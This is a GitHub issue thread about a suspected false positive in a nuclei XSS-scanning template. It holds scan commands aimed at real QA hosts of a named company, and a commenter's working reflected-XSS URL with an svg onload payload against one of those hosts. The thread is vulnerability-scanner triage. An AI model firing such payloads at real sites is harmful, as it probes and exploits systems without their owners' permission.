### ISSUE TITLE
[false-positive] top-xss-params

### ISSUE THREAD

**Issue by pdelteil** [projectdiscovery/nuclei-templates#1030]
**Nuclei version**

```
v2.2.1-dev
```

**Nuclei template version**

```
8.1.1
```

**Template ID**
```
top-xss-params
```
**Commands to Reproduce**

```
nuclei -t  nuclei-templates/vulnerabilities/generic/top-xss-params.yaml -target https://edit-qa.benjerry.com/
nuclei -t  nuclei-templates/vulnerabilities/generic/top-xss-params.yaml -target https://qa-uk.benjerry.com/
```

**Comment by geeknik** [comment]
`nuclei -t  nuclei-templates/vulnerabilities/generic/top-xss-params.yaml -target https://edit-qa.benjerry.com/` is a positive match. You just have to fiddle with the payload a tiny bit to get the XSS to fire.  👍🏻 

Here is the XSS: `https://edit-qa.benjerry.com/?view='>"</script><svg/onload=confirm('testing-xss11')>` which works perfectly under Firefox.

![Screenshot_2021-03-05_10-27-53](https://user-images.githubusercontent.com/466878/110144002-c1ea6b80-7dcf-11eb-8c19-b62333972431.png)

No XSS scanner is perfect, you have to look at the source code of the URL and fiddle with the payload until either A) it works or B) it doesn't work. Good luck out there!

**Comment by ehsandeep** [comment]
thank you @geeknik for reviewing this, @pdelteil  closing as this is a true positive result.
